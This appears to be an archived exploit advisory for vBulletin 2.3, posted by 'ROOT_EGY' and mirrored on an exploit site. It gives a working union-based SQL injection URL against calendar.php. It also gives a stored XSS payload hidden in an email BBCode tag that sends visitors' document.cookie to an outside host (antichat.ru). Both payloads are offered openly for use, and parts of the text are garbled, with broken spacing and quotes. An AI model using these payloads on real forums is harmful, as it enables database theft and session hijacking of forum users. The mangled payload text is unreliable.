id: 10837
date: 02/11/2010
title: vBulletin v 2.3 .* SQL Injection Vulnerability
author: ROOT_EGY
cves: 

==============================================
vBulletin v 2.3 .* SQL Injection Vulnerability
==============================================

# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 2.3
 
===========================================================
 
 
Vulnerability versions 2.3 .* - SQL injection in the validation of input data in 'calendar.php'. Sends SQL requests to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
Vulnerability to Version 2 .*.* - is introducing XSS script tag e-mail
[E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src =' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
 
 
 
===========================================================



#  0day.today [2023-03-23]  #